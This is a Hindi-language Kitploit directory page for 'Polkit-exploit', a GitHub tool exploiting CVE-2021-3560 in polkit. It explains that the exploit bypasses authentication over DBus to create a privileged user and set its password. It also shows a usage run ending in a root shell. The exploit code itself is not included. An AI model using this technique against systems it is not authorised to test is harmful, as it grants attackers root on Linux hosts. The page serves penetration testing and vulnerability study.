Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Polkit-exploit — polkit के साथ विशेषाधिकार वृद्धि - CVE-2021-3560 | Kitploit
उपकरण/GitHubGitHub/almorabea/polkit-exploit
विशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणपोस्ट-शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंग
GitHubalmorabea/polkit-exploit

Polkit-exploit

polkit के साथ विशेषाधिकार वृद्धि - CVE-2021-3560

रिपॉजिटरी देखें
126525 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Polkit-exploit - CVE-2021-3560

पॉल्किट के साथ विशेषाधिकार वृद्धि - CVE-2021-3560

सारांश

CVE-2021-3560 पॉल्किट पर एक प्रमाणीकरण बाईपास है, जो अविशेषाधिकार प्राप्त उपयोगकर्ता को DBus का उपयोग करके विशेषाधिकार प्राप्त विधियों को कॉल करने की अनुमति देता है। इस एक्सप्लॉइट में हम accountsservice द्वारा प्रदान की गई 2 विशेषाधिकार प्राप्त विधियों (CreateUser और SetPassword) को कॉल करेंगे, जो हमें एक विशेषाधिकार प्राप्त उपयोगकर्ता बनाने, उसके लिए पासवर्ड सेट करने, और अंत में बनाए गए उपयोगकर्ता के रूप में लॉग इन करके रूट तक पहुँचने की अनुमति देता है।

एक्सप्लॉइट कोड लेखक

Ahmad Almorabea @almorabea http://almorabea.net

उपयोग

root@kitploit:~
test@ubuntu:~/Desktop$ python3 CVE-2021-3560.py 
**************
Exploit: Privilege escalation with polkit - CVE-2021-3560
Exploit code written by Ahmad Almorabea @almorabea
Original Exploit Author: Kevin Backhouse 
For more details check this: https://github.blog/2021-06-10-privilege-escalation-polkit-root-on-linux-with-bug/#history
[+]Starting the Exploit 
[+] User Created with the name of ahmed
[+] Timed out at: 0.008446890996407191
[+] Timed out at: 0.008934336684707084
[+] Exploit Completed, your new user is 'Ahmed' just log into it like, 'su ahmed', and then 'sudo su' to root 
bash: cannot set terminal process group (46983): Inappropriate ioctl for device
bash: no job control in this shell
root@ubuntu:/home/test/Desktop# id
uid=0(root) gid=0(root) groups=0(root)
root@ubuntu:/home/test/Desktop# whoami
root
root@ubuntu:/home/test/Desktop#

डेमो

GUI प्रमाणीकरण


टर्मिनल प्रमाणीकरण


श्रेय

Kevin Backhouse (https://github.blog/2021-06-10-privilege-escalation-polkit-root-on-linux-with-bug/)

टूल डाउनलोड करें